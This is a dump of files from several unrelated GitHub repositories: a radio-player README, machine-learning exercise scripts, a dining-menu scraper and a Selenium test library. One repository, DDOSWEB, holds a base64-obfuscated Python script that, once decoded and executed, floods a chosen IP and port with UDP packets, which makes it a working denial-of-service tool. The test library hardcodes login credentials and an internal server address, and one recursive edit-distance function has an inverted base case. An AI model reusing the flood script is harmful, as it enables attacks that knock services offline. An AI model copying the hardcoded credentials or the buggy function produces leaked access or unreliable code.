"text": "# myRuneRadio\nEverything you need to upcycle an antique radio into a streaming music player\nIntended as a basic one button functionality radio. Keep it simple. You can easily add more functionality.\nThis will only work using runeaudio and a ky040 rotary encoder in conjunction with a Hifiberry AMP+\n\n##Instructions\nDownload and flash runeaudio to a raspberry pi\nInstall the amp hat\ninstall the ky040 rotary encoder, and hook up to gpio pins (BCM mode)\n+3 volts\ncommon\n###Clock Pin - gpio 5\n###Data Pin - gpio 6\n###Switch Pin - gpio 13\nthese pins are very easy to locate, if you don't understand where they are, simply \nhold the raspberry pi in your hand with the USB slots facing the ceiling.\ncount 1,2,3,4 pins up on the left side.\nthe 4th pin is 13, the one above that is 6, and the one above that is 5\n\nboot it up\nonce booted pull this mother\n\nthenrun:\n[code]\nsudo cp /path-where-this-repo-is-saved-on-your-pi/knob.py /var/www/command/knob.py\n\nsudo cp /path-where-this-repo-is-saved-on-your-pi/knob.service /usr/lib/systemd/system/knob.service\n\n\"\"\"start the service for testing\"\"\"\nsystemctl start knob.service\n\n\"\"\"if it works as expected\"\"\"\nsystemctl enable knob.service\n\n\"\"\" if not: \"\"\"\nsystemctl stop knob.service\n\"\"\" and figure out what you're doing wrong.\"\"\"\n[/code]\n"
}
] | 2 |
DARKFARID13/DDOSWEB | https://github.com/DARKFARID13/DDOSWEB | 146b4ca30a85062afd9d75e9b6451b8243ab5b7c | ba28abaad211098a384394c6fc19f027b5e23fd4 | d0729088e482931aa3cfd017ad151f07244cdfa6 | refs/heads/master | 2020-07-24T07:13:22.124093 | 2019-09-11T15:10:41 | 2019-09-11T15:10:41 | 207,841,758 | 1 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.739130437374115,
"alphanum_fraction": 0.739130437374115,
"avg_line_length": 10.5,
"blob_id": "3a81843cb21a50f2d2bc88ba4c8e4904ee720514",
"content_id": "8defbbc5c3cb5e5d60d1af49b47767905bbf1e18",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 23,
"license_type": "permissive",
"max_line_length": 12,
"num_lines": 2,
"path": "/README.md",
"repo_name": "DARKFARID13/DDOSWEB",
"src_encoding": "UTF-8",
"text": "# DDOSWEB\nDdos web cuk\n"
},
{
"alpha_fraction": 0.6222222447395325,
"alphanum_fraction": 0.7555555701255798,
"avg_line_length": 22,
"blob_id": "fcd1c648fac0b55526c3e8d8ec9d581b42ebff29",
"content_id": "98d4a6f974fc89484c35fa782c6605edd9a0de88",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 45,
"license_type": "permissive",
"max_line_length": 31,
"num_lines": 2,
"path": "/DDOSFARID.py",
"repo_name": "DARKFARID13/DDOSWEB",
"src_encoding": "UTF-8",
"text": "import base64\nexec(base64.b64decode('aW1wb3J0IHRpbWUKaW1wb3J0IHNvY2tldAppbXBvcnQgcmFuZG9tCmltcG9ydCBzeXMKZGVmIHVzYWdlKCk6CiAgICBwcmludCAiXDAzM1sxOzMybSMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyIKICAgIHByaW50ICIjLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS1bXDAzM1sxOzkxbUZBUklELURET1NcMDMzWzE7MzJtXS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tIyIKICAgIHByaW50ICIjLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLSMiCiAgICBwcmludCAiIyAgIFwwMzNbMTs5MW1Db21tYW5kOiAiICJweXRob24yIFRhbWZhbkRkb3MucHkgIiAiPGlwPiA8cG9ydD4gPHBhY2tldD4gXDAzM1sxOzMybSAjIgogICAgcHJpbnQgIiMgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICMjIgogICAgcHJpbnQgIiNcMDMzWzE7OTFtQ3JlYXRvcjpNUi5GNFIxRCAgXDAzM1sxOzMybSMjICAgICAgIyAgICAgICMgICAgICAgICAgICAgICAgICAgICAjIyIKICAgIHByaW50ICIjXDAzM1sxOzkxbVRlYW0gICA6IE1DSSAgICAgICAgXDAzM1sxOzMybSMjICAgICAjICAgICAgIyAgICAgICAgICAgICAgICAgICAgICMjIgogICAgcHJpbnQgIiNcMDMzWzE7OTFtVmVyc2lvbjoxLjAgICAgICAgIFwwMzNbMTszMm0jIyAgICAgICMgICAgICAjICAgICAgICAgICAgICAgICAgICAgIyMiCiAgICBwcmludCAiI1wwMzNbMTs5MW1UUUFkbWluOk1SLkY0UjFEWC1NclJhcGhhZWwtTXJUaGVTcGFtLU1yLkRjLU1yQmxhY2tIYXQgICMjIgogICAgcHJpbnQgIiNcMDMzWzE7OTFtICAgICAgIDpMaWtlV2hpdGUtTXJVa25vd24tTXJTYW5jaGV6LU1yQmltYm9uZy1NclRhbWZhbiAjIyIKICAgIHByaW50ICIjICAgICAgICAgICAgICAgICAgICAgXDAzM1sxOzkxbSAjIyAgICAgXDAzM1sxOzMybSMgIFwwMzNbMTs5MW0gIFwwMzNbMTszMiAgICMjIgogICAgcHJpbnQgIiMgICAgICAgICAgICAgICAgICAgICBcMDMzWzE7OTFtIyMgIFwwMzNbMTszMm0jIyMgICBcMDMzWzE7OTFtICBcMDMzWzE7MzJtICAgIyMiCiAgICBwcmludCAiIyAgICAgICAgICAgICAgIFwwMzNbMTs5MW08LS1bTVVTTElNIENZQkVSIElORE9ORVNJQV0tLT4gICAgICAgICBcMDMzWzE7MzJtICAjIyIKICAgIHByaW50ICIjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMiCiAgICBwcmludCAiICAgICBNZW1iZXI6TXIuWmVlWF9JTkQtSy5SLkEuUy1FZWxlaElORC1XaG9BbUktV2V5dC5UbSIKICAgIHByaW50ICIgICAgICAgICAgIFBlbWJ1YXREZG9zMTpNUi5GNFIxRDE5ODcgQ3liZXIgVGVhbSIKICAgIHByaW50ICIgICAgICAgICAgUGVtYnVhdERkb3MyOk11c2xpbSBDeWJlciBJbmRvbmVzaWEiCmRlZiBmbG9vZCh2aWN0aW0sIHZwb3J0LCBkdXJhdGlvbik6CiAgICAjIFN1cHBvcnQgdXMgeWFha2suLi4gOikKICAgICMgT2tleSBKYWRpIGRpc2luaSBzYXlhIG1lbWJ1YXQgc2VydmVyLCBLZXRpa2Egc2F5YSBtZW1hbmdnaWwgIlNPQ0tfREdSQU0iIGl0dSAgbWVudW5qdWtrYW4gIFVEUCB0eXBlIHByb2dyYW0KICAgIGNsaWVudCA9IHNvY2tldC5zb2NrZXQoc29ja2V0LkFGX0lORVQsIHNvY2tldC5TT0NLX0RHUkFNKQogICAgIyAyMDAwMCByZXByZXNlbnRhc2kgc2F0dSBieXRlIGtlIHNlcnZlcgogICAgYnl0ZXMgPSByYW5kb20uX3VyYW5kb20oMjAwMDApCiAgICB0aW1lb3V0ID0gIHRpbWUudGltZSgpICsgZHVyYXRpb24KICAgIHNlbnQgPSAzMDAwCgogICAgd2hpbGUgMToKICAgICAgICBpZiB0aW1lLnRpbWUoKSA+IHRpbWVvdXQ6CiAgICAgICAgICAgIGJyZWFrCiAgICAgICAgZWxzZToKICAgICAgICAgICAgcGFzcwogICAgICAgIGNsaWVudC5zZW5kdG8oYnl0ZXMsICh2aWN0aW0sIHZwb3J0KSkKICAgICAgICBzZW50ID0gc2VudCArIDEKICAgICAgICBwcmludCAiXDAzM1sxOzkxbU1lbXVsYWkgXDAzM1sxOzMybSVzIFwwMzNbMTs5MW1tZW5naXJpbSBwYWtldCBcMDMzWzE7MzJtJXMgXDAzM1sxOzkxbXBhZGEgcG9ydCBcMDMzWzE7MzJtJXMgIiUoc2VudCwgdmljdGltLCB2cG9ydCkKZGVmIG1haW4oKToKICAgIHByaW50IGxlbihzeXMuYXJndikKICAgIGlmIGxlbihzeXMuYXJndikgIT0gNDoKICAgICAgICB1c2FnZSgpCiAgICBlbHNlOgogICAgICAgIGZsb29kKHN5cy5hcmd2WzFdLCBpbnQoc3lzLmFyZ3ZbMl0pLCBpbnQoc3lzLmFyZ3ZbM10pKQoKaWYgX19uYW1lX18gPT0gJ19fbWFpbl9fJzoKICAgIG1haW4oKQoK'))"
}
] | 2 |
jamie-kieran-martin/320_Python | https://github.com/jamie-kieran-martin/320_Python | fc6196a1b09e22b25e7543b13ee95cd6e1f22d3b | fee65aac1940a637ccdbd2ae6506911ddc1e966e | b9d579dfbf5c946ca84cc8d78182ca562620fa8b | refs/heads/master | 2022-10-24T15:05:07.646087 | 2020-06-16T10:48:16 | 2020-06-16T10:48:16 | 271,412,434 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.3210526406764984,
"alphanum_fraction": 0.378947377204895,
"avg_line_length": 30.83333396911621,
"blob_id": "a32084aeb92bb421e5645fc1a0fd3d50905b11d8",
"content_id": "e4d25139afb54f75ae9e006b4c5c8d16fd57f645",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 190,
"license_type": "no_license",
"max_line_length": 88,
"num_lines": 6,
"path": "/information_gain.py",
"repo_name": "jamie-kieran-martin/320_Python",
"src_encoding": "UTF-8",
"text": "from math import log2\n\nH = lambda p, n: (-p / (p + n)) * log2(p / (p + n)) + (-n / (p + n)) * log2(n / (p + n))\n\nif __name__ == \"__main__\":\n print(((3 / 6) * H(2, 1) + (3 / 6) * H(1, 2)))"
},
{
"alpha_fraction": 0.4134419560432434,
"alphanum_fraction": 0.5010183453559875,
"avg_line_length": 20.34782600402832,
"blob_id": "0f62705e8449921dda04addf940cea051fa9cd86",
"content_id": "33e6d5a46b6146e118be2a1312e9544e7e95cabb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 491,
"license_type": "no_license",
"max_line_length": 72,
"num_lines": 23,
"path": "/q_learning.py",
"repo_name": "jamie-kieran-martin/320_Python",
"src_encoding": "UTF-8",
"text": "Q_table = [\n [0, 1, 2, 3],\n [1, 0.1, 0.5, 0.9],\n [2, 0.2, 0.6, 1.0],\n [3, 0.3, 0.7, 1.1],\n [4, 0.4, 0.8, 1.2]\n]\n\n# Q_table is flipped so that we can use array slices [1:]\n\n# set external values here\nlearning_rate = 0.2\ndiscount = 0.9\nreward = 1\nsn = 2\n# sn = new state\n\n# s = old state, a = action\nQ = lambda s, a: (1 - learning_rate) * Q_table[s][a] + learning_rate * (\n reward + discount * max(Q_table[sn][1:]))\n\nif __name__ == \"__main__\":\n print(Q(3, 1))\n"
},
{
"alpha_fraction": 0.45161867141723633,
"alphanum_fraction": 0.47343945503234863,
"avg_line_length": 28.898395538330078,
"blob_id": "426337fef0e5ea728c81f7b3460c5474d4ae062f",
"content_id": "c2a812524187b7503884df7f216d32fd2aeb665f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5591,
"license_type": "no_license",
"max_line_length": 100,
"num_lines": 187,
"path": "/levenshtein.py",
"repo_name": "jamie-kieran-martin/320_Python",
"src_encoding": "UTF-8",
"text": "import numpy as np\n\n\ndef lev(a,\n b,\n insert_cost=lambda x: 1,\n delete_cost=lambda x: 2,\n match_cost=lambda x, y: 0 if x == y else 4):\n '''\n Compute in a purely recursive fashion\n the Levenshtein distance between\n two sequences a and b\n @param\n a : sequence\n b : sequence\n insert_cost : insert cost function ,\n delete_cost : deletion cost function ,\n match_cost : match cost function\n '''\n\n if a:\n # cost of inserting all elements of sequence b\n return sum([insert_cost(y) for y in b])\n if b:\n # cost of deleting all elements of sequence a\n return sum([delete_cost(x) for x in a])\n\n # the sequences a and b are non-empty\n return min(\n lev(a[:-1], b[:-1]) + match_cost(a[-1], b[-1]),\n lev(a, b[:-1]) + insert_cost(b[-1]),\n lev(a[:-1], b) + delete_cost(a[-1])\n )\n\n\n# edit operation codes\ndict_op = {0: 'match', 1: 'insert', 2: 'delete',\n 'match': 0, 'insert': 1, 'delete': 2}\n\n\n# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\ndef dynprog(x,\n y,\n insert_cost=lambda c: 1,\n delete_cost=lambda c: 2,\n match_cost=lambda cx, cy: 0 if cx == cy else 4):\n '''\n Compute the Levenshtein distance between the two sequences x and y\n @param\n x : sequence\n y : sequence\n insert_cost : insert cost function ,\n delete_cost : deletion cost function ,\n match_cost = match cost function\n\n Compute the cost of editing sequence x into sequence y.\n Let nx , ny = len(x) , len(y)\n Sequence x is indexed from 0 to nx-1 (similar remark for y).\n M[nx,ny] is the cost of editing from x to y\n Note that M[0,3] is the cost of matching the empty string to the first\n 3 characters of sequence y.\n\n\n @return\n M,P\n where\n M is the DP cost matrix\n M[i,j] : cost of matching x[:i] to y[:j]\n Note that x[i] and y[j] are not taken into account for M[i,j]\n M[nx,ny] : cost of matching x[:nx] to y[:ny]\n and\n P is the parent array to trace back the edit sequence\n P is used by the function 'explain_seq'\n '''\n\n nx = len(x)\n ny = len(y)\n\n # Cost matrix M\n # M[i,j] cost of matching the slice x[:i] to the slice y[:j]\n # M[nx,ny] will be the cost of matching the whole sequences\n M = np.zeros((nx + 1, ny + 1), dtype=float)\n\n # P[i,j] indicates to op code use for the last optimal operation\n # in matching the slice x[:i] to the slice y[:j]\n P = np.zeros((nx + 1, ny + 1), dtype=int) # parent\n\n M[1:, 0] = np.cumsum([delete_cost(c) for c in x])\n P[1:, 0] = dict_op['delete'] # delete op code\n\n M[0, 1:] = np.cumsum([insert_cost(c) for c in y])\n P[0, 1:] = dict_op['insert'] # insert op code\n\n for ix in range(1, nx + 1):\n for iy in range(1, ny + 1):\n # print('ix {} iy {} '.format(ix,iy) )\n # M[ix][iy] cost of matching\n # x[:ix] =x[0],..,x[ix-1 to y[:iy] = y[0],..,y[iy-1]\n L = [M[ix - 1, iy - 1] + match_cost(x[ix - 1], y[iy - 1]), # match x[ix-1] and y[iy-1]\n M[ix, iy - 1] + insert_cost(y[iy - 1]), # insert y[iy-1]\n M[ix - 1, iy] + delete_cost(x[ix - 1])] # delete x[ix-1]\n i_min = np.argmin(L)\n P[ix][iy] = i_min\n M[ix][iy] = L[i_min]\n return M, P\n\n\n# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\ndef explain_dynprog(x, y, M, P):\n '''\n Retrieve the optimal sequence of edit operations given\n the dyn prog tables M,P\n @pre\n M,P have been computed by 'dynprog'\n '''\n nx = len(x)\n ny = len(y)\n L = []\n ix, iy = nx, ny\n while ix > 0 and iy > 0:\n if P[ix, iy] == 0: # 'match op':\n L.append(' match {} and {} '.format(x[ix - 1], y[iy - 1]))\n ix -= 1\n iy -= 1\n elif P[ix, iy] == 1: # 'insert 
op'\n L.append('insert ' + str(y[iy - 1]))\n iy -= 1\n else: # 'delete op'\n L.append('delete ' + str(x[ix - 1]))\n ix -= 1\n # print('<A> ix = {} iy = {} '.format(ix,iy) )\n while ix > 0:\n L.append('delete ' + str(x[ix - 1]))\n ix -= 1\n while iy > 0:\n L.append('insert ' + str(y[iy - 1]))\n iy -= 1\n\n return list(reversed(L))\n\n\ndef levenshtein(seq1, seq2):\n size_x = len(seq1) + 1\n size_y = len(seq2) + 1\n matrix = np.zeros((size_x, size_y))\n\n for x in range(size_x):\n matrix[x, 0] = x\n for y in range(size_y):\n matrix[0, y] = y\n\n for x in range(1, size_x):\n for y in range(1, size_y):\n if seq1[x - 1] == seq2[y - 1]:\n matrix[x, y] = min(\n matrix[x - 1, y] + 1,\n matrix[x - 1, y - 1],\n matrix[x, y - 1] + 1\n )\n else:\n matrix[x, y] = min(\n matrix[x - 1, y] + 1,\n matrix[x - 1, y - 1] + 1,\n matrix[x, y - 1] + 1\n )\n\n print(matrix)\n\n return matrix[size_x - 1, size_y - 1]\n\n\nif __name__ == \"__main__\":\n w1, w2 = 'sunda', 'satu'\n\n print('w1 = {}'.format(w1))\n print('w2 = {}'.format(w2))\n\n M, P = dynprog(w1, w2,\n insert_cost=lambda c: 1,\n delete_cost=lambda c: 2,\n match_cost=lambda cx, cy: 0 if cx == cy else 4)\n\n L = explain_dynprog(w1, w2, M, P)\n print(L)\n print(levenshtein(w1, w2))\n"
}
] | 3 |
dbordak/RU-Food-Scraper | https://github.com/dbordak/RU-Food-Scraper | 3c8cb4df5eb8fc5b1cbdb1859d3165b9770076df | e6633fb6d457c1796c58545563df00751791aaa8 | dcdc93e5863e5a27a44a391adcf7467cca969ebd | refs/heads/master | 2021-01-21T03:13:21.602033 | 2014-05-08T21:38:27 | 2014-05-08T22:07:04 | null | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.553415060043335,
"alphanum_fraction": 0.5621716380119324,
"avg_line_length": 12.619047164916992,
"blob_id": "e0bf4a472acc9bafe81b74dbbd5e0d3960c4890d",
"content_id": "495970ee03298f4e45ae15799747c64dfe258833",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 571,
"license_type": "no_license",
"max_line_length": 78,
"num_lines": 42,
"path": "/README.md",
"repo_name": "dbordak/RU-Food-Scraper",
"src_encoding": "UTF-8",
"text": "#Rutgers Nutritional Information Scraper\n\nScrapes food.rutgers.edu for menus and nutritional information, saves to file.\n\n###Format\n\n```\n{\n\tBrower Commons : {\n\t\tBreakfast : [\n\t\t\t{\n\t\t\t\tname : 'ITEM NAME',\n\t\t\t\tserving : 'SERVING SIZE',\n\t\t\t\tcalories : 100,\n\t\t\t\tingredients : 'INGREDIENT1, INGREDIENT2, ...'\n\t\t\t},\n\t\t\t{\n\t\t\t\t...\n\t\t\t},\n\t\t\t...\n\t\t],\n\t\tLunch : [\n\t\t\t...\n\t\t],\n\t\tDinner : [\n\t\t\t...\n\t\t]\n\t},\n\tBusch Dining Hall : {\n\t\t...\n\t},\n\tNeilson Dining Hall : {\n\t\t...\n\t},\n\tLivingston Dining Commons : {\n\t\t...\n\t}\n}\n```\n\n###Dependencies\nPython script requires package `BeautifulSoup`."
},
{
"alpha_fraction": 0.6700796484947205,
"alphanum_fraction": 0.6750094890594482,
"avg_line_length": 30.39285659790039,
"blob_id": "0849bea5dcc6798f29f10cd3a1598ec8b886cbe0",
"content_id": "52f9987e2b45c5626f0796c5afc5bc0af863393b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2637,
"license_type": "no_license",
"max_line_length": 92,
"num_lines": 84,
"path": "/scrape.py",
"repo_name": "dbordak/RU-Food-Scraper",
"src_encoding": "UTF-8",
"text": "#!/bin/python\nfrom bs4 import BeautifulSoup\nfrom re import compile\ntry:\n\tfrom urllib2 import urlopen\nexcept:\n\tfrom urllib.request import urlopen\nimport json\nfrom sys import stdout\nfrom argparse import ArgumentParser, FileType\n\nparser = ArgumentParser(prog='RU Food Scraper', description='Scrape the Rutgers' +\n 'Dining Website for nutritional information\\n' +\n 'Prints output as json.')\nparser.add_argument('outfile', nargs='?', type=FileType('w'), default=stdout,\n help=\"Output file (defaults to stdout).\")\nparser.add_argument('--fancy', dest='fancy', action='store_true', default=False)\nargs = parser.parse_args()\n\ningredientSplit = compile(r'(?:[^,(]|\\([^)]*\\))+')\nURL_PREFIX = \"http://menuportal.dining.rutgers.edu/foodpro/\"\n\ndef scrapeNutritionReport(url):\n\t\"\"\"Scrapes a Nutrition Report page, returns name, serving, calories, ingredients\"\"\"\n\tpage = urlopen(url).read()\n\tsoup = BeautifulSoup(page)\n\tret = {}\n\n\t# Get item name\n\ttry:\n\t\tret['name'] = soup.find(id=\"content-text\").find_all(\"h2\")[1].string\n\texcept AttributeError:\n\t\tpass\n\n\t# Get serving size\n\ttry:\n\t\tret['serving'] = soup.find(id=\"facts\").find(\"p\", \"\").string[len(\"Serving Size \"):]\n\texcept AttributeError:\n\t\tpass\n\n\t# Get calorie count.\n\ttry:\n\t\tret['calories'] = int(soup.find(id=\"facts\").find(\"p\", \"strong\").string[len(\"Calories \"):])\n\texcept AttributeError:\n\t\tpass\n\n\t# Get ingredient list\n\ttry:\n\t\te = soup.find(text=compile(\"INGREDIENTS\")).parent\n\t\tp = e.parent\n\t\te.decompose()\n\t\tret['ingredients'] = [ing.strip() for ing in ingredientSplit.findall(p.string)]\n\texcept AttributeError:\n\t\tpass\n\n\treturn ret\n\ndef scrapeMeal(url):\n\t\"\"\"Parses meal, calls for scraping of each nutrition facts\"\"\"\n\tpage = urlopen(url).read()\n\tsoup = BeautifulSoup(page)\n\tsoup.prettify()\n\treturn [scrapeNutritionReport(URL_PREFIX + link['href']) for link in\n\t soup.find(\"div\", \"menuBox\").find_all(\"a\", href=True)]\n\ndef scrapeCampus(url):\n\t\"\"\"Calls for the scraping of the meals of a campus\"\"\"\n\t# TODO: Add takeout?\n\tmeals = ('Breakfast', 'Lunch', 'Dinner')\n\treturn {meal: scrapeMeal(url + \"&mealName=\" + meal) for meal in meals}\n\ndef scrape():\n\t\"\"\"Calls for the scraping of the menus of each campus\"\"\"\n\tprefix = URL_PREFIX + \"pickmenu.asp?locationNum=0\"\n\t# There doesn't seem to be a hall #2\n\thalls = (('Brower Commons', '1'), ('Livingston Dining Commons', '3'),\n\t ('Busch Dining Hall', '4'), ('Neilson Dining Hall', '5'))\n\treturn {hall[0]: scrapeCampus(prefix + hall[1]) for hall in halls}\n\nif args.fancy:\n\tjson.dump(scrape(), args.outfile, indent=1)\nelse:\n\tjson.dump(scrape(), args.outfile)\nargs.outfile.close()\n"
}
] | 2 |
casteller/ccedu | https://github.com/casteller/ccedu | e1eb12356fba4367d66f89bd416000623dd0fed0 | e80ff5e9c071293ce6ba66597acaa32c632b69d4 | d6bbce9cfebbf02b5289b2d67a8917173e6f6cf4 | refs/heads/master | 2020-06-26T06:44:42.029583 | 2020-04-02T02:35:31 | 2020-04-02T02:35:31 | 199,562,430 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.5916877388954163,
"alphanum_fraction": 0.6046054363250732,
"avg_line_length": 49.63768005371094,
"blob_id": "d20615b82cabf5ee5bb4e8e100ce84adbd6c6440",
"content_id": "574ed1d9caf0f8f03ab68fe2d109c72d473e0290",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3639,
"license_type": "no_license",
"max_line_length": 115,
"num_lines": 69,
"path": "/test/pylib/webLib.py",
"repo_name": "casteller/ccedu",
"src_encoding": "UTF-8",
"text": "# coding=utf-8\r\nfrom cfg import *\r\nfrom selenium import webdriver\r\nimport time\r\nfrom selenium.webdriver import ActionChains\r\nclass webLib(object):\r\n ROBOT_LIBRARY_SCOPE = 'GLOBAL'\r\n def __init__(self):\r\n pass\r\n #打开浏览器\r\n def open_browser(self):\r\n self.wd = webdriver.Chrome()\r\n self.wd.maximize_window()\r\n self.wd.implicitly_wait(10)\r\n #关闭浏览器\r\n def close_browser(self):\r\n self.wd.quit()\r\n #登录\r\n def login(self,username,password):\r\n self.wd.get(loginurl)\r\n self.wd.find_element_by_name(\"username\").send_keys(username)\r\n self.wd.find_element_by_name(\"password\").send_keys(password)\r\n self.wd.find_element_by_xpath(\"//button\").click()\r\n #切换到后台管理\r\n def changeback(self):\r\n self.wd.find_element_by_xpath(\"//div[@class='edu-header-user']\").click()\r\n self.wd.find_element_by_xpath(\"//div[@class='edu-header-user']//li[1]\").click()\r\n\r\n #添加老师\r\n def addteacher(self):\r\n self.wd.find_element_by_xpath(\"//ul[contains(@class,'main')]/li[3]//div/span\").click()\r\n self.wd.find_element_by_xpath(\"//ul[contains(@class,'main')]/li[3]//ul//span\").click()\r\n time.sleep(2)\r\n self.wd.find_element_by_xpath(\"//div[@ng-controller='lecturerListController']//div[2]/button[1]\").click()\r\n self.wd.find_element_by_xpath(\"//div/input[@ng-model='lecturer.name']\").send_keys(\"李睿\")\r\n time.sleep(2)\r\n self.wd.find_element_by_xpath(\"//div/span[@ng-click='selectCompany()']\").click()\r\n self.wd.find_element_by_xpath(\"//div[@class='box-tree']\").click()\r\n time.sleep(1)\r\n self.wd.find_element_by_xpath(\"//div/button[@ng-click='ok()']\").click()\r\n self.wd.find_element_by_xpath(\"//div/input[@ng-model='lecturer.position']\").send_keys(\"物理老师\")\r\n self.wd.find_element_by_xpath(\"//div/input[@ng-model='lecturer.masterCourse']\").send_keys(\"物理\")\r\n self.wd.find_element_by_xpath(\"//div/input[@ng-model='lecturer.mobile']\").send_keys(\"15928604750\")\r\n self.wd.find_element_by_xpath(\"//div/input[@ng-model='lecturer.phone']\").send_keys(\"02882777172\")\r\n self.wd.find_element_by_xpath(\"//div/input[@ng-model='lecturer.email']\").send_keys(\"[email protected]\")\r\n self.wd.find_element_by_xpath(\"//div/textarea[@ng-model='lecturer.introduction']\").send_keys(\"资深物理老师\")\r\n self.wd.find_element_by_xpath(\"//div/button[@ng-click='save()']\").click()\r\n #添加课件\r\n def addkejian(self):\r\n self.wd.find_element_by_xpath(\"//ul[contains(@class,'main')]/li[6]//div/span\").click()\r\n self.wd.find_element_by_xpath(\"//ul[contains(@class,'main')]/li[6]//ul[1]//li[1]//span\").click()\r\n time.sleep(2)\r\n self.wd.find_element_by_xpath(\"//div[@ng-controller='coursewareListController']//div[2]/button[1]\").click()\r\n self.wd.find_element_by_xpath(\"//div/input[@ng-model='courseware.name']\").send_keys(\"课件名称\")\r\n time.sleep(1)\r\n self.wd.find_element_by_xpath(\"//div[@ng-model='courseware.specialty']\").click()\r\n self.wd.find_element_by_xpath(\"//div[@ng-model='courseware.specialty']//ul//li//div[3]/a\").click()\r\n self.wd.find_element_by_xpath(\"//div/textarea[@ng-model='courseware.explain']\").send_keys(\"课件简介\")\r\n self.wd.find_element_by_xpath(\"//div/button[@ng-click='save()']\").click()\r\n self.wd.find_element_by_xpath(\"//div/button[@ng-click='back()']\").click()\r\n\r\nif __name__ == '__main__':\r\n op = webLib()\r\n op.open_browser()\r\n op.login(\"zhangqingqin\",\"tfwsdx@2019\")\r\n op.changeback()\r\n op.addteacher()\r\n # op.addteacher()\r\n # op.addkejian()"
},
{
"alpha_fraction": 0.4794520437717438,
"alphanum_fraction": 0.6712328791618347,
"avg_line_length": 34.5,
"blob_id": "0e7fdc72d01d6a362cc9daee2ff2d2bd44a54c50",
"content_id": "d09d3eb58e74f45492d230246e4bc7600393ec4a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 73,
"license_type": "no_license",
"max_line_length": 55,
"num_lines": 2,
"path": "/test/cfg.py",
"repo_name": "casteller/ccedu",
"src_encoding": "UTF-8",
"text": "# coding=utf-8\r\nloginurl = \"http://10.206.1.168:8084/ccsedu/a/login.do\"\r\n"
},
{
"alpha_fraction": 0.5766847133636475,
"alphanum_fraction": 0.5917893052101135,
"avg_line_length": 41.344261169433594,
"blob_id": "2dc4d5555d7c4e14efed1c9960fcac596d6af205",
"content_id": "ddc2ce61574849490e5e496d7b4a3d982e4f871e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2698,
"license_type": "no_license",
"max_line_length": 149,
"num_lines": 61,
"path": "/test/pylib/studyLib.py",
"repo_name": "casteller/ccedu",
"src_encoding": "UTF-8",
"text": "# coding=utf-8\nimport requests,json,time\nfrom pprint import pprint\nclass studyLib(object):\n ip = \"10.206.1.168:8084\"\n time = time.strftime(\"%Y-%m-%d\", time.localtime())\n def header(self):\n headers = {\n 'Host': studyLib.ip,\n 'Cookie':'APP_SESSIONID='+cookies,\n 'Connection': 'keep-alive',\n 'Content-Type': 'application/x-www-form-urlencoded;charset=UTF-8'\n }\n return headers\n #获取cookies\n def get_cookie(self):\n session = requests.Session()\n url = \"http://\"+self.ip+\"/ccsedu/a/login.do\"\n payload = {'args': None, 'usertype':2, 'username':'zhangqingqin', 'password':'tfwsdx@2019'}\n session.post(url,data=payload)\n s = session.cookies.get_dict()\n print(s['APP_SESSIONID'])\n return s['APP_SESSIONID']\n #添加老师\n def addteacher(self,name,masterCourse,externalUnit,position):\n url = \"http://\"+studyLib.ip+\"/ccsedu/a/js/jsgl/saveLecturer \"\n payload = {'name':name,'sex':1,'levels':1,'type':2,'masterCourse':masterCourse,'externalUnit':externalUnit,'position':position}\n res = requests.post(url,data=payload,headers=SL.header())\n print(res.json())\n #添加课件\n def addkejian(self,name,explain,specialty):\n url = \"http://\"+studyLib.ip+\"/ccsedu/a/kc/kjgl/saveCourseware\"\n payload = {'name':name,'explain':explain,'specialty':specialty,'corpId':510101,'deptId':51000005,'createBy':89787,'createDate':studyLib.time}\n r = requests.post(url,data=payload,headers=SL.header())\n print(r.json())\n #试题呈报\n def submit(self,id):\n url = \"http://\"+studyLib.ip+\"/ccsedu/a/ks/tkgl/reportQuestion\"\n payload = {'id': id}\n r = requests.post(url, data=payload, headers=SL.header())\n print(r.json())\n #试题审核\n def audit(self, id):\n url = \"http://\"+studyLib.ip+\"/ccsedu/a/ks/tkgl/auditQuestion\"\n payload = {'id': id}\n r = requests.post(url, data=payload, headers=SL.header())\n print(r.json()['msg'])\nif __name__ == '__main__':\n SL = studyLib()\n cookies = SL.get_cookie()\n # res = SL.addteacher(\"李睿\",'数学','未知机构','职务数学老师')\n # re = SL.addkejian(\"测试添加课件\",\"测试课件简介\",1)\n # with open(r'C:\\Users\\Administrator\\Desktop\\ksid.txt','r')as f:\n # ids = f.read().splitlines()\n # for id in ids:\n # SL.audit(id)\n # with open(r'C:\\Users\\Administrator\\Desktop\\username.txt', 'r')as f:\n # users = f.read().splitlines()\n # for user in users:\n # SL.get_cookie(user)\n 